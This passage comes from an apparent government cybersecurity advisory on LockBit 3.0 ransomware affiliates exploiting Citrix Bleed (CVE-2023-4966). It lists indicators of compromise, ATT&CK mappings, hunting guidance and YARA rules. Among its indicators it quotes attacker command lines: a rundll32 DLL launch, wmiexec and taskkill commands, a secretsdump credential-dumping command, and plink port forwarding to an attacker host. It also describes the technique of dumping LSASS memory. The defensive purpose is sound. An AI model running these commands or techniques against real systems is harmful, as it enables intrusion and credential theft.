</tr></tbody></table><p>The resulting file (<code>adobelib.dll</code>) is then executed by the PowerShell script using <code>rundll32</code>.</p>
<p><code>rundll32 C:\Users\Public\adobelib.dll,main &lt;104 hex char key&gt;</code></p>
<p>The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.</p>
<p>Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.</p>
<h3>INDICATORS OF COMPROMISE (IOCS)</h3>
<p>See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.</p>
<p><strong>[Fidelity] Legend:</strong></p>
<ul><li>High = Indicator is unique or highly indicates LockBit in an environment.</li>
<li>Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.</li>
<li>Low = Indicates tools that are commonly used but were used by LockBit.</li>
</ul><p>Low confidence indicators may not be related to ransomware.</p>
<h5><em>Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign</em></h5>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Indicator</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Type</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Fidelity</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Description</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>192.229.221[.]95</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>Low</p>
</td>
<td>
<p>Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.</p>
</td>
</tr><tr><td>
<p>123.ps1</p>
</td>
<td>
<p>PowerShell script</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Creates and executes payload via script.</p>
</td>
</tr><tr><td>
<p>193.201.9[.]224</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>FTP to Russian geolocated IP from compromised system</p>
</td>
</tr><tr><td>
<p>62.233.50[.]25</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Russian geolocated IP from compromised system</p>
<p>Hxxp://62.233.50[.]25/en-us/docs.html</p>
<p>Hxxp://62.233.50[.]25/en-us/test.html</p>
</td>
</tr><tr><td>
<p>51.91.79[.].17</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>Med</p>
</td>
<td>
<p>Temp.sh IP</p>
</td>
</tr><tr><td>
<p>Teamviewer</p>
</td>
<td>
<p>Tool (Remote Admin)</p>
</td>
<td>
<p>Low</p>
</td>
<td>
<p> </p>
</td>
</tr><tr><td>
<p>70.37.82[.]20</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>Low</p>
</td>
<td>
<p>IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.</p>
</td>
</tr><tr><td>
<p>185.17.40[.]178</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>Low</p>
</td>
<td>
<p>Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address</p>
</td>
</tr></tbody></table><h5><em>Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign</em></h5>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Indicator</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Type</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Fidelity</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Description</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>185.229.191.41</p>
</td>
<td>
<p>Anydesk Usage</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Anydesk C2</p>
</td>
</tr><tr><td>
<p>81.19.135[.]219</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta</p>
<p>Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta</p>
</td>
</tr><tr><td>
<p>45.129.137[.]233</p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>Medium</p>
</td>
<td>
<p>Callouts from known compromised device beginning during the compromised window.</p>
</td>
</tr><tr><td>
<p>185.229.191[.]41</p>
</td>
<td>
<p>Anydesk Usage</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Anydesk C2</p>
</td>
</tr><tr><td>
<p>Plink.exe</p>
</td>
<td>
<p>Command interpreter</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.</p>
</td>
</tr><tr><td>
<p>AnyDeskMSI.exe</p>
</td>
<td>
<p>Remote admin tool</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>We do see that AnyDeskMSI.exe was installed as a service with "auto start" abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.</p>
</td>
</tr><tr><td>
<p>SRUtility.exe</p>
</td>
<td>
<p>Splashtop utility</p>
</td>
<td>
<p> </p>
</td>
<td>
<p>9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a</p>
</td>
</tr><tr><td>
<p>Netscan exe</p>
</td>
<td>
<p>Network scanning software</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155</p>
</td>
</tr></tbody></table><h5><em>Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign</em></h5>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Indicator</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Type</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Fidelity</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Description</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>Scheduled task:</p>
<p>\MEGA\MEGAcmd</p>
</td>
<td>
<p>Persistence</p>
<p> </p>
</td>
<td>
<p>High</p>
</td>
<td>
<p> </p>
</td>
</tr><tr><td>
<p>Scheduled task:</p>
<p>UpdateAdobeTask</p>
</td>
<td>
<p>Persistence</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p> </p>
</td>
</tr><tr><td>
<p>Mag.dll</p>
</td>
<td>
<p>Persistence</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63</p>
<p> </p>
<p> </p>
</td>
</tr><tr><td>
<p>123.ps1</p>
</td>
<td>
<p>Script</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Creates rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44</p>
<p> </p>
<p> </p>
</td>
</tr><tr><td>
<p>Adobelib.dll</p>
</td>
<td>
<p>Persistence</p>
</td>
<td>
<p>Low</p>
</td>
<td>
<p>C2 from adobelib.dll.</p>
</td>
</tr><tr><td>
<p>Adobe-us-updatefiles[.]digital</p>
</td>
<td>
<p>Tool Download</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Used to download obfuscated toolsets</p>
</td>
</tr><tr><td>
<p>172.67.129[.]176</p>
</td>
<td>
<p>Tool Download</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>IP of adobe-us-updatefiles[.]digital</p>
</td>
</tr><tr><td>
<p>104.21.1[.]180</p>
</td>
<td>
<p>Tool Download</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Adobe-us-updatefiles[.]digital</p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c cd 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>wmiexec.exe usage</p>
<p> </p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c cd \ 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>wmiexec.exe usage</p>
<p> </p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c query user 1&gt; \\127.0.0.1\admin$\__1698617793[.]44 2&gt;&amp;1</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>wmiexec.exe usage</p>
<p> </p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>wmiexec.exe usage</p>
<p> </p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c cd \ 1&gt; \\127.0.0.1\admin$\__1698618133[.]54 2&gt;&amp;1</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>wmiexec.exe usage</p>
<p> </p>
</td>
</tr><tr><td>
<p>cmd.exe /q /c cd \ 1&gt; \\127.0.0.1\admin$\__1698618203[.]51 2&gt;&amp;1</p>
<p> </p>
</td>
<td>
<p>Command</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p> </p>
</td>
</tr></tbody></table><p>The authoring organizations recommended monitoring/reviewing traffic to the <code>81.19.135[.]*</code> class C network and review for MSHTA being called with HTTP arguments [<a href="https://www.mcafee.com/learn/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/">3</a>].</p>
<h5><strong><em>Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign</em></strong></h5>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Indicator</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Type</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Fidelity</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Description</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Notes</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>81.19.135[.]219</p>
<p> </p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta</p>
</td>
<td>
<p> </p>
<p> </p>
</td>
</tr><tr><td>
<p>81.19.135[.]220</p>
<p> </p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Russian geolocated IP, seen outbound in logs</p>
</td>
<td>
<p>IP registered to a South African Company</p>
</td>
</tr><tr><td>
<p>81.19.135[.]226</p>
<p> </p>
</td>
<td>
<p>IP</p>
</td>
<td>
<p>High</p>
</td>
<td>
<p>Russian geolocated IP, seen outbound in logs</p>
</td>
<td>
<p>IP registered to a South African Company</p>
</td>
</tr></tbody></table><h5><em>Table 5: Citrix Bleed Indicators of Compromise (IOCs)</em></h5>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Type</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Indicator</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Description</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\downloads\process hacker 2\peview.exe</p>
</td>
<td>
<p>Process hacker</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\music\process hacker 2\processhacker.exe</p>
</td>
<td>
<p>Process hacker</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>psexesvc.exe</p>
</td>
<td>
<p>Psexec service excutable</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\perflogs\processhacker.exe</p>
</td>
<td>
<p>Process hacker</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe</p>
</td>
<td>
<p>Process hacker transferred via screenconnect</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\perflogs\lsass.dmp</p>
</td>
<td>
<p>Lsass dump</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\downloads\mimikatz.exe</p>
</td>
<td>
<p>Mimikatz</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\desktop\proc64\proc.exe</p>
</td>
<td>
<p>Procdump</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\documents\veeam-get-creds.ps1</p>
</td>
<td>
<p>Decrypt veeam creds</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>secretsdump.py</p>
</td>
<td>
<p>Impacket installed on azure vm</p>
</td>
</tr><tr><td>
<p>Cmdline</p>
</td>
<td>
<p>secretsdump.py &lt;domain&gt;/&lt;username&gt;@&lt;ip&gt; -outputfile 1</p>
</td>
<td>
<p>Impacket installed on azure vm</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>ad.ps1</p>
</td>
<td>
<p>Adrecon found in powershell transcripts</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>c:\perflogs\64-bit\netscan.exe</p>
</td>
<td>
<p>Softperfect netscan</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>tniwinagent.exe</p>
</td>
<td>
<p>Total network inventory agent</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>psexec.exe</p>
</td>
<td>
<p>Psexec used to deploy screenconnect</p>
</td>
</tr><tr><td>
<p>Filename</p>
</td>
<td>
<p>7z.exe</p>
</td>
<td>
<p>Used to compress files</p>
</td>
</tr><tr><td>
<p>Tool</p>
</td>
<td>
<p>Action1</p>
</td>
<td>
<p>RMM</p>
</td>
</tr><tr><td>
<p>Tool</p>
</td>
<td>
<p>Atera</p>
</td>
<td>
<p>RMM</p>
</td>
</tr><tr><td>
<p>tool</p>
</td>
<td>
<p>anydesk</p>
</td>
<td>
<p>rmm</p>
</td>
</tr><tr><td>
<p>tool</p>
</td>
<td>
<p>fixme it</p>
</td>
<td>
<p>rmm</p>
</td>
</tr><tr><td>
<p>tool</p>
</td>
<td>
<p>screenconnect</p>
</td>
<td>
<p>rmm</p>
</td>
</tr><tr><td>
<p>tool</p>
</td>
<td>
<p>splashtop</p>
</td>
<td>
<p>rmm</p>
</td>
</tr><tr><td>
<p>tool</p>
</td>
<td>
<p>zoho assist</p>
</td>
<td>
<p>rmm</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>101.97.36[.]61</p>
</td>
<td>
<p>zoho assist</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>168.100.9[.]137</p>
</td>
<td>
<p>ssh portforwarding infra</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>185.20.209[.]127</p>
</td>
<td>
<p>zoho assist</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>185.230.212[.]83</p>
</td>
<td>
<p>zoho assist</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>206.188.197[.]22</p>
</td>
<td>
<p>powershell reverse shell seen in powershell logging</p>
</td>
</tr><tr><td>
<p>ipv4</p>
</td>
<td>
<p>54.84.248[.]205</p>
</td>
<td>
<p>fixme ip</p>
</td>
</tr><tr><td>
<p>Ipv4</p>
</td>
<td>
<p>141.98.9[.]137</p>
</td>
<td>
<p>Remote IP for CitrixBleed</p>
</td>
</tr><tr><td>
<p>domain</p>
</td>
<td>
<p>assist.zoho.eu</p>
</td>
<td>
<p>zoho assist</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\perflogs\1.exe</p>
</td>
<td>
<p>connectwise renamed</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\perflogs\run.exe</p>
</td>
<td>
<p>screenconnect pushed by psexec</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\perflogs\64-bit\m.exe</p>
</td>
<td>
<p>connectwise renamed</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\perflogs\64-bit\m0.exe</p>
</td>
<td>
<p>connectwise renamed</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\perflogs\za_access_my_department.exe</p>
</td>
<td>
<p>zoho remote assist</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\users\&lt;username&gt;\music\za_access_my_department.exe</p>
</td>
<td>
<p>zoho remote assist</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\windows\servicehost.exe</p>
</td>
<td>
<p>plink renamed</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\windows\sysconf.bat</p>
</td>
<td>
<p>runs servicehost.exe (plink) command</p>
</td>
</tr><tr><td>
<p>filename</p>
</td>
<td>
<p>c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi</p>
</td>
<td>
<p>zoho remote assist used to transfer data via screenconnect</p>
</td>
</tr><tr><td>
<p>cmdline</p>
</td>
<td>
<p>echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 &lt;username&gt;@168.100.9[.]137 -pw &lt;password&gt;</p>
</td>
<td>
<p>plink port forwarding</p>
</td>
</tr><tr><td>
<p>domain</p>
</td>
<td>
<p>eu1-dms.zoho[.]eu</p>
</td>
<td>
<p>zoho assist</p>
</td>
</tr><tr><td>
<p>domain</p>
</td>
<td>
<p>fixme[.]it</p>
</td>
<td>
<p>fixme it</p>
</td>
</tr><tr><td>
<p>domain</p>
</td>
<td>
<p>unattended.techninline[.]net</p>
</td>
<td>
<p>fixme it</p>
</td>
</tr></tbody></table><h3>MITRE ATT&amp;CK Tactics and Techniques</h3>
<p>See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.</p>
<h5><em>Table 6: ATT&amp;CK Techniques for Enterprise: Discovery</em></h5>
<table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Technique Title</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>ID</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Use</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>System Information Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1082/">T1082</a></p>
</td>
<td>
<p>Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches.</p>
</td>
</tr></tbody></table><h5>Table 7: <em>ATT&amp;CK Techniques for Enterprise: Credential Access</em></h5>
<table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Technique Title</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>ID</strong></p>
</th>
<th scope="col" role="columnheader">
<p><strong>Use</strong></p>
</th>
</tr></thead><tbody><tr><td>
<p>Modify Authentication Process: Multifactor Authentication</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1556/006/">T1556.006</a></p>
</td>
<td>
<p>Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access.</p>
</td>
</tr><tr><td>
<p>Steal Web Session Cookie</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v14/techniques/T1539/">T1539</a></p>
</td>
<td>
<p>Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens.</p>
</td>
</tr></tbody></table><h3>DETECTION METHODS</h3>
<h4><strong>Hunting Guidance</strong></h4>
<p>Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.</p>
<p>For IP addresses:</p>
<ul><li>Identify if NetScaler logs the change in IP.</li>
<li>Identify if users are logging in from geolocations uncommon for your organization’s user base.</li>
<li>If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed.</li>
</ul><p><strong>Note: </strong>MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.</p>
<p>The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:</p>
<ul><li>Search for filenames that contain <code>tf0gYx2YI</code> for identifying LockBit encrypted files.</li>
<li>LockBit 3.0 actors were seen using the <code>C:\Temp</code> directory for loading and the execution of files.</li>
<li>Investigate requests to the HTTP/S endpoint from WAF.</li>
<li>Hunt for suspicious login patterns from NetScaler logs</li>
<li>Hunt for suspicious virtual desktop agent Windows Registry keys</li>
<li>Analyze memory core dump files.</li>
</ul><p>Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) <a href="https://www.cisa.gov/news-events/analysis-reports/ar23-325a">MAR-10478915-1.v1 Citrix Bleed</a> or the resource section of this CSA [<a href="https://www.mandiant.com/resources/blog/session-hijacking-citrix-cve-2023-4966">2</a>]:</p>
<h4><strong>YARA Rules</strong></h4>
<p>CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:</p>
<ul><li>Windows Batch file (.bat)</li>
<li>Windows Executable (.exe)</li>
<li>Windows Dynamic Link Library (.dll)</li>
<li>Python Script (.py)</li>
</ul><table class="MsoTableGrid"><tbody><tr><td>
<p>rule CISA_10478915_01 : trojan installs_other_components</p>
<p>{</p>
<p>meta:</p>
<p>author = "CISA Code &amp; Media Analysis"</p>
<p>incident = "10478915"</p>
<p>date = "2023-11-06"</p>
<p>last_modified = "20231108_1500"</p>
<p>actor = "n/a"</p>
<p>family = "n/a"</p>
<p>capabilities = "installs-other-components"</p>
<p>malware_Type = "trojan"</p>
<p>tool_type = "information-gathering"</p>
<p>description = "Detects trojan .bat samples"</p>
<p>sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"</p>
<p>strings:</p>
<p>$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }</p>
<p>$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73</p>
<p>5c 65 6d }</p>
<p>$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64</p>
<p>6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }</p>
<p>condition:</p>
<p>all of them</p>
<p>}</p>
</td>
</tr></tbody></table><p>This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:\Windows\Tasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.</p>
<p>The next command it runs is reg save to save the HKLM\SYSTEM registry hive into the C:\Windows\tasks\em directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLM\SAM registry hive into the C:\Windows\Task\am directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\Users\Public\a.png. The names of the .cab files are as follows:</p>
<ul><li>c:\windows\tasks\em.cab</li>
<li>c:\windows\tasks\am.cab</li>
<li>c:\windows\tasks\a.cab</li>
</ul><table class="MsoTableGrid"><tbody><tr><td>
<p>rule CISA_10478915_02 : trojan installs_other_components</p>
<p>{</p>
<p>meta:</p>
<p>author = "CISA Code &amp; Media Analysis"</p>
<p>incident = "10478915"</p>
<p>date = "2023-11-06"</p>
<p>last_modified = "20231108_1500"</p>
<p>actor = "n/a"</p>
<p>family = "n/a"</p>
<p>capabilities = "installs-other-components"</p>
<p>malware_type = "trojan"</p>
<p>tool_type = "unknown"</p>
<p>description = "Detects trojan PE32 samples"</p>
<p>sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"</p>
<p>strings:</p>
<p>$s1 = { 57 72 69 74 65 46 69 6c 65 }</p>
<p>$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }</p>
<p>$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }</p>
<p>$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }</p>
<p>$s5 = { 64 65 6c 65 74 65 5b 5d }</p>
<p>$s6 = { 4e 41 4e 28 49 4e 44 29 }</p>
<p>condition:</p>
<p>uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of</p>
<p>them</p>
<p>}</p>
</td>
</tr></tbody></table><p>This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console.</p>
<table class="MsoTableGrid"><tbody><tr><td>
<p>rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation</p>
<p>{</p>
<p>meta:</p>
<p>author = "CISA Code &amp; Media Analysis"</p>
<p>incident = "10478915"</p>
<p>date = "2023-11-06"</p>
<p>last_modified = "20231108_1500"</p>
<p>actor = "n/a"</p>
<p>family = "n/a"</p>
<p>capabilities = "steals-authentication-credentials"</p>
<p>malware_type = "trojan"</p>
<p>tool_type = "credential-exploitation"</p>
<p>description = "Detects trojan DLL samples"</p>
<p>sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"</p>
<p>strings:</p>
<p>$s1 = { 64 65 6c 65 74 65 }</p>
<p>$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }</p>
<p>$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }</p>
<p>$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }</p>
<p>$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }</p>
<p>$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }</p>
<p>condition:</p>
<p>uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of</p>
<p>them</p>
<p>}</p>
</td>
</tr></tbody></table><p>This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public.</p>
<p>Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:\Windows\Tasks.</p>
<table class="MsoTableGrid"><tbody><tr><td>
<p>rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access</p>
<p>{</p>
<p>meta:</p>
<p>author = "CISA Code &amp; Media Analysis"</p>
<p>incident = "10478915"</p>
<p>date = "2023-11-06"</p>
<p>last_modified = "20231108_1500"</p>
<p>actor = "n/a"</p>
<p>family = "n/a"</p>
<p>capabilities = "communicates-with-c2"</p>
<p>malware_type = "backdoor"</p>
<p>tool_type = "remote-access"</p>
